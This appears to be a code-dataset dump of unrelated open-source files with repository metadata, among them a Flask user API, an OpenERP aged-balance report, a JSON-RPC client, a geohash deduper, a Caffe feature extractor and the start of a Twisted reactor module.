# drone.move(0,-50) # turn left?
# drone.spin() # spin around
# drone.simpleAnimation(0)
# drone.simpleAnimation(9)
# Currently known values:
# - 0 : stop
# - 1 : spin
# - 2 : tap
# - 3 : slowshake
# - 4 : metronome
# - 5 : ondulation
# - 6 : spinjump
# - 7 : spintoposture
# - 8 : spiral
# - 9 : slalom
# """
shell.interact()
drone.stop()
|
bsd-3-clause
| -245,576,819,196,394,050
| 21.870588
| 117
| 0.667181
| false
| 2.901493
| false
| false
| false
|
JDongian/LangGrind
|
src/parse_raw.py
|
1
|
1957
|
"""Parse human data into JSON"""
import string
def parse_file(filename="../data/RAW.txt"):
"""Parse human readable file into JSON."""
entries = []
with open(filename) as f_in:
next_line = f_in.readline()
data = {}
state = "section"
while next_line:
if state == "section":
line = next_line.split(" ")
if line[0] == "Chapter":
data = {'section': {'chapter': int(line[1]),
'part': line[4].strip()}}
state = "term"
elif state == "term":
if not next_line.strip():
state = "section"
next_line = f_in.readline()
continue
entry = data.copy()
term, definition = next_line.split(";")
#print("'{}'".format(next_line))
entry['term'] = term.strip()
entry['definitions'] = [_.strip() for\
_ in definition.split(",")]
entry['class'] = []
# Determine the lexical class of the word.
if "(be)" in "".join(entry['definitions']):
entry['class'].append("adjective")
for _ in entry['definitions']:
initial = _.split(" ")[0]
end = _[-1]
if initial in ["a", "an"]:
entry['class'].append("noun")
if initial in ["to"]:
entry['class'].append("verb")
if end in ".!?":
entry['class'].append("phrase")
# Proper nouns
elif initial[0] in string.ascii_uppercase:
entry['class'].append("noun")
entries.append(entry)
next_line = f_in.readline()
return entries
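# Illustrative sketch of the input format this parser assumes (the real
# RAW.txt may differ) - a "Chapter" header line followed by "term; definitions":
#
# Chapter 1 - Part Greetings
# hola; hello, hi
#
# which would yield an entry roughly like:
# {'section': {'chapter': 1, 'part': 'Greetings'},
#  'term': 'hola', 'definitions': ['hello', 'hi'], 'class': []}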
|
gpl-3.0
| 6,378,814,179,138,106,000
| 38.14
| 67
| 0.406234
| false
| 4.832099
| false
| false
| false
|
prateeksan/python-design-patterns
|
structural/adapter.py
|
1
|
3485
|
""" The Adapter Pattern
Notes:
If the interface of an object does not match the interface required by the
client code, this pattern recommends using an 'adapter' that can create a proxy
interface. It is particularly useful in homogenizing interfaces of
non-homogeneous objects.
The following example represents a use case for adapting various resource
types to be readable as text resources. We assume that the client programmer
works with resource objects that wrap binary, web-based or textual data. Each
of the aforementioned has its own type and interface but we need to read them
all as text type objects. Since every resource type can be represented as text
(albeit the method calls to do so vary), we use the TextResourceAdapter to
homogenize the interface and output the textual representation using a common
read() method (set to behave like the read() method for TextResource).
"""
class TextResource:
"""We assume that our server can only read text. Therefore this resource is
the only resource the server knows how to interpret.
"""
def read(self):
return "Sample plain text."
class BinaryResource:
"""An instance of this class wraps binary data. While it has many output
formats, the server can only read the plain-text output.
"""
def read_plain_text(self):
return "Sample plain text from binary."
def read_raw(self):
pass
def read_interactive(self):
pass
class WebResource:
"""An instance of this class wraps web data. While it has many output
formats, the server can only read the json output.
"""
def read_json(self):
return "Sample plain text as json."
def read_html(self):
pass
class IncompatibleResourceError(Exception):
pass
class TextResourceAdapter:
"""Acts as an adapter that uses the read() method to return a textual
representation of the client_resource.
"""
convertibles = ("TextResource", "BinaryResource", "WebResource")
def __init__(self, client_resource):
self._verify_compatibility(client_resource)
self._client_resource = client_resource
def read(self):
"""Note that for a resource to use the adapter, it needs to be
configured beforehand in this method. You can modify this
implementation to change that behaviour, depending on your use case.
"""
if self._client_resource.__class__ is BinaryResource:
return self._client_resource.read_plain_text()
elif self._client_resource.__class__ is WebResource:
return self._client_resource.read_json()
return self._client_resource.read()
def _verify_compatibility(self, resource):
"""Since we need to pre-configure the adapter to handle various resource
types, we raise an error if the client_resource is not pre-configured.
"""
if resource.__class__.__name__ not in self.__class__.convertibles:
raise IncompatibleResourceError("{} cannot be adapted.".format(
resource.__class__.__name__))
if __name__ == "__main__":
client_resources = [BinaryResource(), WebResource(), TextResource()]
for resource in client_resources:
print("Adapting {} as a text resource...".format(
resource.__class__.__name__))
adapted_resource = TextResourceAdapter(resource)
# Note how the read interface has been homogenized.
print(adapted_resource.read() + "\n")
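# For reference, running this module directly should print roughly:
#
# Adapting BinaryResource as a text resource...
# Sample plain text from binary.
#
# Adapting WebResource as a text resource...
# Sample plain text as json.
#
# Adapting TextResource as a text resource...
# Sample plain text.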
|
mit
| 5,776,622,469,529,610,000
| 32.84466
| 80
| 0.68637
| false
| 4.456522
| false
| false
| false
|
3dfxsoftware/cbss-addons
|
account_aged_partner_balance_report/report/account_aged_partner_balance_report.py
|
1
|
10928
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Addons modules by CLEARCORP S.A.
# Copyright (C) 2009-TODAY CLEARCORP S.A. (<http://clearcorp.co.cr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import pooler
from report import report_sxw
from tools.translate import _
from openerp.osv import fields, osv
from openerp.addons.account_report_lib.account_report_base import accountReportbase
class Parser(accountReportbase):
def __init__(self, cr, uid, name, context):
super(Parser, self).__init__(cr, uid, name, context=context)
self.localcontext.update({
'cr' : cr,
'uid': uid,
'storage':{},
'set_data_template': self.set_data_template,
'set_data_move_lines': self.set_data_move_lines,
'get_data':self.get_data,
'get_data_by_partner':self.get_data_by_partner,
'get_period_length': self.get_period_length,
'get_direction_selection': self.get_direction_selection,
'display_account_type':self.display_account_type,
'display_direction_selection': self.display_direction_selection,
'display_period_length': self.display_period_length,
'process_lines_period':self.process_lines_period,
})
#====Extract data from wizard==============================================
def get_period_length(self, data):
return self._get_form_param('period_length', data)
def get_direction_selection(self, data):
return self._get_form_param('direction_selection', data)
def get_account_type(self, data):
return self._get_form_param('account_type', data)
"""
Return a dictionary for the given partner, with this structure:
result[account_type] = list of move lines
"""
def get_data_by_partner(self, partner_id):
return self.localcontext['storage']['result'][partner_id]
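# Illustrative shape of the value returned above (built by get_data below),
# e.g. {'receivable': [<move line>, ...], 'payable': [<move line>, ...]}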
#==========================================================================
#====Display data==========================================================
def display_account_type(self, data=None, account_type=None):
#if it's necessary to display in report's header
if data:
account_type = self.get_account_type(data)
##Options for report information (keys are different)
if account_type == 'receivable':
return _('Receivable Accounts')
elif account_type == 'payable':
return _('Payable Accounts')
###Options for header
if account_type == 'customer':
return _('Receivable accounts')
elif account_type == 'supplier':
return _('Payable accounts')
elif account_type == 'customer_supplier':
return _('Payable and Receivable accounts')
return ''
def display_direction_selection(self, data):
direction_selection = self.get_direction_selection(data)
if direction_selection == 'past':
return _('Past')
elif direction_selection == 'future':
return _('Future')
return ''
def display_period_length(self, data):
return self.get_period_length(data)
#===== Set data =========================================================
#set data to use in odt template.
def set_data_template(self, cr, uid, data):
result, partner_ids_order = self.get_data(cr, uid, data)
dict_update = {'result': result, 'partner_ids_order': partner_ids_order,}
self.localcontext['storage'].update(dict_update)
return False
def set_data_move_lines(self, data, move_lines):
#move_lines is a dictionary
move_lines, partner_total = self.process_lines_period(data, move_lines)
dict_update = {'move_lines':move_lines, 'partner_total':partner_total}
self.localcontext['storage'].update(dict_update)
return False
#==========================================================================
def get_move_lines(self, data):
account_account_obj = self.pool.get('account.account')
account_move_line_obj = self.pool.get('account.move.line')
account_type_domain = []
#Get parameters
date_from = str(self.get_date_from(data))
direction_selection = str(self.get_direction_selection(data))
account_type = self.get_account_type(data)
if account_type == 'customer':
account_type_domain.append('receivable')
if account_type == 'supplier':
account_type_domain.append('payable')
if account_type == 'customer_supplier':
account_type_domain.append('receivable')
account_type_domain.append('payable')
#Build domains
account_account_ids = account_account_obj.search(self.cr, self.uid, [('type', 'in', account_type_domain), ('active','=',True)])
account_move_line_domain = [('state', '=', 'valid'), ('reconcile_id', '=', False), ('account_id', 'in', account_account_ids)]
#=====Build a account move lines domain
#Date
tuple_date = ()
if direction_selection == 'past':
tuple_date = ('date','<=', date_from)
account_move_line_domain.append(tuple_date)
else:
tuple_date = ('date','>=', date_from)
account_move_line_domain.append(tuple_date)
#Get move_lines based on previous domain
account_move_line_ids = account_move_line_obj.search(self.cr, self.uid, account_move_line_domain, order='date_maturity desc')
account_move_lines = account_move_line_obj.browse(self.cr, self.uid, account_move_line_ids)
return account_move_lines
def get_data(self, cr, uid, data):
partner_ids = []
res = {}
""" 1. Extract move lines """
move_lines = self.get_move_lines(data)
""" 2. Classified move_lines by partner and account_type """
for line in move_lines:
if line.partner_id:
partner_id = line.partner_id.id
else:
partner_id = 0 #key for lines that don't have partner_id
#== Create a list, them order it by name ============
if partner_id not in partner_ids:
partner_ids.append(partner_id)
#====================================================
if partner_id not in res.keys():
res[partner_id] = {}
if line.account_id.type not in res[partner_id].keys():
res[partner_id][line.account_id.type] = []
res[partner_id][line.account_id.type].append(line)
#Sort by partner's name (alphabetically)
partner_ids_order = self.pool.get('res.partner').search(cr, uid, [('id','in', partner_ids)], order='name ASC')
partner_list = self.pool.get('res.partner').browse(self.cr, self.uid, partner_ids_order)
return res, partner_list
#Process each column for line.
def process_lines_period(self, data, move_lines):
res = {}
partner_total = 0.0
result_list = [7]
#Get parameters
date_from = str(self.get_date_from(data))
direction_selection = str(self.get_direction_selection(data))
for line in move_lines:
# (re)initialize the column values for this line
result_list = [0.0 for i in range(7)]
if not line.date_maturity or direction_selection == 'past' and line.date_maturity > date_from \
or direction_selection == 'future' and line.date_maturity < date_from:
if line.debit:
value = line.debit
else:
value = line.credit
result_list[0] = value
if line.date_maturity >= data['form']['4']['start'] and line.date_maturity <= data['form']['4']['stop']:
if line.debit:
value = line.debit
else:
value = line.credit
result_list[1] = value
if line.date_maturity >= data['form']['3']['start'] and line.date_maturity <= data['form']['3']['stop']:
if line.debit:
value = line.debit
else:
value = line.credit
result_list[2] = value
if line.date_maturity >= data['form']['2']['start'] and line.date_maturity <= data['form']['2']['stop']:
if line.debit:
value = line.debit
else:
value = line.credit
result_list[3] = value
if line.date_maturity >= data['form']['1']['start'] and line.date_maturity <= data['form']['1']['stop']:
if line.debit:
value = line.debit
else:
value = line.credit
result_list[4] = value
if line.date_maturity and data['form']['0']['stop'] and line.date_maturity <= data['form']['0']['stop'] or line.date_maturity and data['form']['0']['start'] and line.date_maturity >= data['form']['0']['start']:
if line.debit:
value = line.debit
else:
value = line.credit
result_list[5] = value
#Total by partner
partner_total += line.debit if line.debit else line.credit * -1
result_list[6] = partner_total
res[line.id] = result_list
return res, partner_total
|
gpl-2.0
| 284,019,789,491,869,440
| 41.858824
| 221
| 0.522053
| false
| 4.333069
| false
| false
| false
|
nosuchtim/VizBench
|
src/jsonrpc/jsonrpc.py
|
1
|
1044
|
# Utility to send JSON RPC messages
# Avoid the requests module to reduce installation hassles
import urllib
import urllib2
import json
import sys
verbose = False
def dorpc(port,meth,params):
url = 'http://127.0.0.1:%d/api' % (port)
id = '12345'
data = '{ "jsonrpc": "2.0", "method": "'+meth+'", "params": '+params+', "id":"'+id+'" }\n'
req = urllib2.Request(url,data)
r = urllib2.urlopen(req)
response = r.read()
if verbose:
print "HTTP status code = ",r.getcode()
print "HTTP url = ",r.geturl()
print "HTTP info = ",r.info()
print "response is ",response
j = json.loads(response)
if "error" in j:
print "ERROR: "+str(j["error"]["message"])
elif "result" in j:
print "RESULT: "+str(j["result"])
else:
print "No error or result in JSON response!? r="+r
if __name__ == '__main__':
if len(sys.argv) < 2:
print "Usage: jsonrpc {port} {meth} [ {params} ]"
else:
port = int(sys.argv[1])
meth = sys.argv[2]
if len(sys.argv) < 4:
params = "{}"
else:
params = sys.argv[3]
dorpc(port,meth,params)
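# Example invocation (port, method and params here are purely illustrative):
#
# python jsonrpc.py 4444 echo '{"value": "hello"}'
#
# which POSTs this JSON-RPC 2.0 body to http://127.0.0.1:4444/api:
#
# { "jsonrpc": "2.0", "method": "echo", "params": {"value": "hello"}, "id": "12345" }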
|
mit
| 6,698,785,829,892,262,000
| 22.2
| 91
| 0.6159
| false
| 2.690722
| false
| false
| false
|
h4wldev/Frest
|
app/routes/api/v1/users/user.py
|
1
|
6676
|
# -*- coding: utf-8 -*-
import re
import datetime
from flask import request
from flask_api import status
from flask_restful import Resource
from sqlalchemy.exc import IntegrityError
from werkzeug.security import generate_password_hash
from app import db, token_auth
from app.models.user_model import UserModel, get_user
from app.models.user_token_model import token_is_auth, token_load_with_auth, token_expire_all, token_delete_all
from app.modules import frest
from app.modules.frest.api.error import get_exists_error
from app.modules.frest.validate import user as userValidate
from app.modules.frest.serialize.user import serialize_user
_URL = '/users/<prefix>'
class User(Resource):
"""
@api {get} /users/:prefix Get particular user's info
@apiName User Info
@apiGroup Users
@apiHeader {String} Authorization Access token.
@apiHeaderExample {json} Header-Example:
{
"Authorization": "304924"
}
@apiParam {String} prefix user's prefix
@apiSuccess (200) {String} data Users data.
@apiError (401) UnAuthorized You don't have permission.
@apiError (400) ValueError Prefix can only be me or number
"""
@frest.API
@token_auth.login_required
def get(self, prefix):
try:
if prefix == 'me':
user_id = token_load_with_auth(request.headers['Authorization'])['user_id']
else:
user_id = int(prefix)
if token_is_auth(request.headers['Authorization'], user_id):
user = get_user(user_id)
return serialize_user(user), status.HTTP_200_OK
else:
return "You don't have permission.", status.HTTP_401_UNAUTHORIZED
except ValueError:
return "Prefix can only be me or a number.", status.HTTP_400_BAD_REQUEST
"""
@api {put} /users/:prefix Update user info
@apiName Update user info
@apiGroup Users
@apiPermission Admin
@apiHeader {String} Authorization Access token.
@apiHeaderExample {json} Header-Example:
{
"Authorization": "304924"
}
@apiParam {String} prefix user's prefix
@apiSuccess (200) None
@apiError (400) BadRequest Invalid input - Prefix can only be me or a number.
@apiError (401) UnAuthorized You don't have permission - Should be admin.
@apiError (404) NotFound User not found.
"""
@frest.API
@token_auth.login_required
def put(self, prefix):
try:
if prefix == 'me':
user_id = token_load_with_auth(request.headers['Authorization'])['user_id']
else:
user_id = int(prefix)
user_query = UserModel.query \
.filter(UserModel.id == user_id)
if token_is_auth(request.headers['Authorization'], user_id):
user_permission = token_load_with_auth(request.headers['Authorization'])['permission']
if user_permission != 'ADMIN' and request.form.get('permission') is not None:
return "You don't have permission.", status.HTTP_401_UNAUTHORIZED
form = userValidate.modificationForm(request.form)
if form.validate():
if user_query.count():
user = user_query.first()
try:
for key, value in request.form.items():
if value is not None and value != '':
if key == 'password':
value = generate_password_hash(value)
token_expire_all(user.id)
setattr(user, key, value)
user.updated_at = datetime.datetime.now()
db.session.commit()
except IntegrityError as e:
field, value = get_exists_error(e)
_return = {
'message': "'" + value + "' is already exists.",
'field': {
'label': getattr(form, field).label.text,
'name': field
}
}
return _return, status.HTTP_400_BAD_REQUEST
return None, status.HTTP_200_OK
else:
return "The user does not exist.", status.HTTP_404_NOT_FOUND
for field, errors in form.errors.items():
for error in errors:
_return = {
'message': error,
'field': getattr(form, field).label.text
}
return _return, status.HTTP_400_BAD_REQUEST
else:
return "You don't have permission.", status.HTTP_401_UNAUTHORIZED
except ValueError:
return "Prefix can only be me or a number.", status.HTTP_400_BAD_REQUEST
"""
@api {delete} /users/:prefix Delete user
@apiName User Delete
@apiGroup Users
@apiHeader {String} Authorization Access token.
@apiHeaderExample {json} Header-Example:
{
"Authorization": "304924"
}
@apiParam {String} prefix user's prefix
@apiSuccess (200) None
@apiError (404) NotFound User not found.
@apiError (401) UnAuthorized You don't have permission.
@apiError (400) ValueError Prefix can only be me or number
"""
@frest.API
@token_auth.login_required
def delete(self, prefix):
try:
if prefix == 'me':
user_id = token_load_with_auth(request.headers['Authorization'])['user_id']
else:
user_id = int(prefix)
user_query = UserModel.query \
.filter(UserModel.id == user_id)
if token_is_auth(request.headers['Authorization'], user_id):
if user_query.count():
token_delete_all(user_id)
user = user_query.first()
db.session.delete(user)
db.session.commit()
return None, status.HTTP_200_OK
else:
return "The user does not exist.", status.HTTP_404_NOT_FOUND
else:
return "You don't have permission.", status.HTTP_401_UNAUTHORIZED
except ValueError:
return "Prefix can only be me or a number.", status.HTTP_400_BAD_REQUEST
|
mit
| 2,234,537,345,375,100,000
| 33.770833
| 111
| 0.539994
| false
| 4.532247
| false
| false
| false
|
Nikola-K/django_reddit
|
users/models.py
|
1
|
1565
|
from hashlib import md5
import mistune
from django.contrib.auth.models import User
from django.db import models
class RedditUser(models.Model):
user = models.OneToOneField(User)
first_name = models.CharField(max_length=35, null=True, default=None,
blank=True)
last_name = models.CharField(max_length=35, null=True, default=None,
blank=True)
email = models.EmailField(null=True, blank=True, default=None)
about_text = models.TextField(blank=True, null=True, max_length=500,
default=None)
about_html = models.TextField(blank=True, null=True, default=None)
gravatar_hash = models.CharField(max_length=32, null=True, blank=True,
default=None)
display_picture = models.NullBooleanField(default=False)
homepage = models.URLField(null=True, blank=True, default=None)
twitter = models.CharField(null=True, blank=True, max_length=15,
default=None)
github = models.CharField(null=True, blank=True, max_length=39,
default=None)
comment_karma = models.IntegerField(default=0)
link_karma = models.IntegerField(default=0)
def update_profile_data(self):
self.about_html = mistune.markdown(self.about_text)
if self.display_picture:
self.gravatar_hash = md5(self.email.lower().encode('utf-8')).hexdigest()
def __unicode__(self):
return "<RedditUser:{}>".format(self.user.username)
|
apache-2.0
| -6,009,276,806,158,894,000
| 42.472222
| 84
| 0.628754
| false
| 3.95202
| false
| false
| false
|
selentd/pythontools
|
pytools/src/oldsrc/addindex.py
|
1
|
2335
|
import datetime
import pymongo
from pymongo.mongo_client import MongoClient
import indexdata
def getIndexEntry( indexData ):
return indexData.getDictionary()
def getIndexDateEntry( indexData ):
return { "date": datetime.datetime(indexData.date.year,
indexData.date.month,
indexData.date.day,
0,
0)
}
def getIndexHistory( source, size = 10000000 ):
indexHistory = indexdata.IndexHistory(source, size)
indexHistory.readIndex()
return indexHistory
def addIndex( source, dbName, indexName ):
#client = MongoClient("192.168.81.147")
client = MongoClient("127.0.0.1")
database = client[dbName]
collection = database[indexName]
collection.create_index([("date", pymongo.ASCENDING)],
name="date",
unique=True)
indexHistory = getIndexHistory(source)
for indexData in indexHistory.indexHistory:
indexEntry = getIndexEntry(indexData)
indexDate = getIndexDateEntry(indexData)
if collection.find_one(indexDate) == None:
collection.insert(indexEntry)
def addIndizes():
'''
addIndex('../../data/sp500.csv', 'stockdb', 'sp500')
addIndex('../../data/tecdax.csv', 'stockdb', 'tecdax')
addIndex('../../data/mdax.csv', 'stockdb', 'mdax')
addIndex('../../data/nasdaq100.csv', 'stockdb', 'nasdaq100')
addIndex('../../data/smi.csv', 'stockdb', 'smi')
addIndex('../../data/tecdax.csv', 'stockdb', 'tecdax')
'''
indexList = ['atx',
'brent',
'cac',
'dax',
'dowjones',
'estoxx50',
'ftse100',
'ftsemib',
'gold',
'hangseng',
'hscei',
'ibex',
'mdax',
'nasdaq100',
'nikkei',
'sdax',
'smi',
'sp500',
'tecdax']
for index in indexList:
print '../../data/'+index+'.csv'
addIndex('../../data/'+index+'.csv', 'stockdb', index)
if __name__ == '__main__':
addIndizes()
|
apache-2.0
| 2,964,568,120,293,750,000
| 28.556962
| 64
| 0.494647
| false
| 3.964346
| false
| false
| false
|
Rezzie/Batcher
|
generators/g_randomchoice.py
|
1
|
2268
|
#!/usr/bin/env python
# Copyright (c) 2011, The University of York
# All rights reserved.
# Author(s):
# James Arnold <jarnie@gmail.com>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the The University of York nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE UNIVERSITY OF YORK BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from generator import Generator
import random
class random_choice(Generator):
def __init__(self, choices, seed=None):
assert len(choices) > 0
self.__choices = choices
if seed is not None:
random.seed(seed)
def Generate(self):
"""Return one of the choices at random."""
while True:
yield random.choice(self.__choices)
if __name__ == "__main__":
from generator import PrintExamples
options = {'choices': ["James", "Ralph", "Rob", "Mike", "Harry"],
'seed': 2398639}
gen = random_choice(**options)
PrintExamples(gen)
|
bsd-3-clause
| -5,633,717,101,477,794,000
| 37.440678
| 80
| 0.713845
| false
| 4.395349
| false
| false
| false
|
openvenues/address_normalizer
|
address_normalizer/deduping/near_duplicates.py
|
1
|
6806
|
import geohash
import logging
import operator
from functools import partial
from itertools import chain, product, combinations, imap
from address_normalizer.deduping.duplicates import *
from address_normalizer.deduping.storage.base import *
from address_normalizer.text.gazetteers import *
from address_normalizer.text.normalize import *
from address_normalizer.models.address import *
from address_normalizer.models.venue import *
near_dupe_registry = {}
# Two lat/longs sharing a geohash prefix of 6 characters are within about 610 meters of each other
DEFAULT_GEOHASH_PRECISION = 6
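# Rough sketch of how this precision is used further down (coordinates made up):
#   cell = geohash.encode(40.75, -73.99, DEFAULT_GEOHASH_PRECISION)  # 6-char cell id
#   cells = [cell] + geohash.neighbors(cell)  # the cell plus its 8 neighbours
# so two nearby points that straddle a cell boundary still share a candidate key.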
logger = logging.getLogger('near_dupes')
class NearDupeMeta(type):
def __init__(cls, name, bases, dict_):
if 'abstract' not in dict_:
near_dupe_registry[cls.__entity_type__] = cls
super(NearDupeMeta, cls).__init__(name, bases, dict_)
dupe_cache = {}
class NearDupe(object):
abstract = True
__metaclass__ = NearDupeMeta
key_generators = ()
configured = False
storage = NopStorage()
@classmethod
def configure(cls, storage):
cls.storage = storage
@classmethod
def find_dupes(cls, ents):
if not ents:
return {}, {}, {}
entity_dict = {e.guid: e for e in ents}
clusters = defaultdict(set)
_ = [clusters[safe_encode(c)].add(ent.guid) for ent in ents for c in cls.gen_keys(ent)]
clusters = dict(clusters)
logger.info('{} clusters found'.format(len(clusters)))
logger.info('Checking for local dupes')
local_guid_pairs = set()
local_dupes = {}
for cluster_id, guids in clusters.iteritems():
if len(guids) < 2:
continue
local_guid_pairs.update(combinations(guids, 2))
for g1, g2 in local_guid_pairs:
ent1 = entity_dict[g1]
ent2 = entity_dict[g2]
if cls.exact_dupe.is_dupe(ent1, ent2):
cls.assign_local_dupe(local_dupes, ent1, ent2)
logger.info('Checking global dupes')
existing_clusters = defaultdict(list)
if clusters:
_ = [existing_clusters[c].append(guid) for c, guid in cls.storage.search(clusters.keys()).iteritems() if guid]
existing_guids = set()
existing_ents = {}
if existing_clusters:
existing_guids = set.union(*(set(v) for v in existing_clusters.itervalues()))
existing_ents = {guid: cls.model(json.loads(e)) for guid, e in cls.storage.multiget(list(existing_guids)).iteritems() if e}
global_dupes = {}
global_guid_pairs = set([(new_guid, existing_guid) for cluster_id, existing in existing_clusters.iteritems() for new_guid, existing_guid in product(clusters[cluster_id], existing)])
for new_guid, existing_guid in global_guid_pairs:
local_ent = entity_dict[new_guid]
existing_ent = existing_ents[existing_guid]
if cls.exact_dupe.is_dupe(existing_ent, local_ent):
cls.assign_global_dupe(global_dupes, existing_ent, local_ent)
logger.info('Done with global dupe checking')
return clusters, local_dupes, global_dupes
@classmethod
def check(cls, objects, add=True):
object_dict = {o.guid: o for o in objects}
clusters, local_dupes, global_dupes = cls.find_dupes(objects)
new_clusters = {}
new_objects = {}
dupes = local_dupes.copy()
dupes.update(global_dupes)
if add:
for k, guids in clusters.iteritems():
non_dupes = [g for g in guids if g not in dupes]
if non_dupes:
guid = non_dupes[0]
new_clusters[k] = guid
new_objects[guid] = object_dict[guid]
cls.add({guid: json.dumps(obj.to_primitive()) for guid, obj in new_objects.iteritems()})
cls.add_clusters(new_clusters)
return [(obj, (dupes.get(obj.guid, obj.guid), obj.guid in dupes)) for obj in objects]
@classmethod
def assign_local_dupe(cls, dupes, existing, new):
guid1 = existing.guid
guid2 = new.guid
guid1_existing = dupes.get(guid1)
guid2_existing = dupes.get(guid2)
if not guid1_existing and not guid2_existing:
dupes[guid1] = guid2
elif guid1_existing:
dupes[guid2] = guid1_existing
elif guid2_existing:
dupes[guid1] = guid2_existing
@classmethod
def assign_global_dupe(cls, dupes, existing, new):
dupes[new.guid] = existing.guid
@classmethod
def add(cls, kvs):
cls.storage.multiput(kvs)
@classmethod
def add_clusters(cls, kvs):
cls.storage.multiput(kvs)
class AddressNearDupe(NearDupe):
__entity_type__ = Address.entity_type
model = Address
exact_dupe = AddressDupe
geohash_precision = DEFAULT_GEOHASH_PRECISION
street_gazetteers = list(chain(*[gazette_field_registry[f] for f in (address_fields.NAME, address_fields.HOUSE_NUMBER, address_fields.STREET)]))
all_gazetteers = list(chain(*gazette_field_registry.values()))
@classmethod
def configure(cls, storage, bloom_filter=None, geohash_precision=DEFAULT_GEOHASH_PRECISION):
cls.storage = storage
if bloom_filter:
cls.bloom_filter = bloom_filter
cls.geohash_precision = geohash_precision
@classmethod
def expanded_street_address(cls, address):
street_address_components = []
house_number = (address.house_number or '').strip()
if house_number:
street_address_components.append(house_number)
street = (address.street or '').strip()
if street:
street_address_components.append(street)
surface_forms = set()
if street_address_components:
street_address = u' '.join(street_address_components)
# expand_street_address returns the set of normalized surface forms
# for the joined street address
return address_phrase_filter.expand_street_address(street_address)
return surface_forms
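# e.g. for an address with house_number '123' and street 'Main St' this might
# yield something like set(['123 main street', '123 main st']); illustrative
# only, the actual expansions depend on the configured gazetteers.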
@classmethod
def geohash(cls, address):
geo = geohash.encode(address.latitude, address.longitude, cls.geohash_precision)
neighbors = geohash.neighbors(geo)
all_geo = [geo] + neighbors
return all_geo
@classmethod
def gen_keys(cls, address):
street_surface_forms = cls.expanded_street_address(address)
if address.latitude and address.longitude:
all_geo = cls.geohash(address)
for geo, norm_address in product(all_geo, street_surface_forms):
key = '|'.join([geo, norm_address])
yield key
class VenueNearDupe(NearDupe):
__entity_type__ = Venue.entity_type
model = Venue
|
mit
| 7,338,996,294,223,279,000
| 31.108491
| 189
| 0.618425
| false
| 3.725233
| false
| false
| false
|
miyanishi2/caffe-rpc
|
caffe_extractor.py
|
1
|
1439
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'miyanishi'
import caffe
import numpy as np
class CaffeExtractor():
def __init__(self, caffe_root=None, feature_layers=["fc6"], gpu=True):
self.feature_layers = feature_layers
MODEL_FILE = caffe_root + 'examples/imagenet/imagenet_deploy.prototxt'
PRETRAINED = caffe_root + 'examples/imagenet/caffe_reference_imagenet_model'
MEAN_FILE = caffe_root + 'python/caffe/imagenet/ilsvrc_2012_mean.npy'
self.net = caffe.Classifier(MODEL_FILE, PRETRAINED, mean=np.load(MEAN_FILE),
channel_swap=(2,1,0),
raw_scale=255,
image_dims=(256, 256))
#self.net.set_phase_test()
if gpu:
self.net.set_mode_gpu()
else:
self.net.set_mode_cpu()
imagenet_labels_filename = caffe_root + 'data/ilsvrc12/synset_words.txt'
self.labels = np.loadtxt(imagenet_labels_filename, str, delimiter='\t')
def getImageFeatures(self, image):
score = self.net.predict([image])
feature_dic = {layer:np.copy(self.net.blobs[layer].data[4][:,0,0]) for layer in self.feature_layers}
return feature_dic
def getImageLabels(self):
top_k = self.net.blobs['prob'].data[4].flatten().argsort()[-1:-6:-1]
labels = self.labels[top_k].tolist()
return labels
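# Minimal usage sketch (paths, layer names and image file are assumptions,
# not something shipped with this module):
#
# extractor = CaffeExtractor(caffe_root='/opt/caffe/', feature_layers=['fc6', 'fc7'], gpu=False)
# image = caffe.io.load_image('cat.jpg')
# features = extractor.getImageFeatures(image)
# labels = extractor.getImageLabels()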
|
bsd-2-clause
| -3,062,253,772,976,018,400
| 36.868421
| 108
| 0.587908
| false
| 3.323326
| false
| false
| false
|
Donkyhotay/MoonPy
|
twisted/internet/posixbase.py
|
1
|
14121
|
# -*- test-case-name: twisted.test.test_internet -*-
# Copyright (c) 2001-2009 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Posix reactor base class
"""
import warnings
import socket
import errno
import os
from zope.interface import implements, classImplements
from twisted.python.compat import set
from twisted.internet.interfaces import IReactorUNIX, IReactorUNIXDatagram
from twisted.internet.interfaces import IReactorTCP, IReactorUDP, IReactorSSL, IReactorArbitrary
from twisted.internet.interfaces import IReactorProcess, IReactorMulticast
from twisted.internet.interfaces import IHalfCloseableDescriptor
from twisted.internet import error
from twisted.internet import tcp, udp
from twisted.python import log, failure, util
from twisted.persisted import styles
from twisted.python.runtime import platformType, platform
from twisted.internet.base import ReactorBase, _SignalReactorMixin
try:
from twisted.internet import ssl
sslEnabled = True
except ImportError:
sslEnabled = False
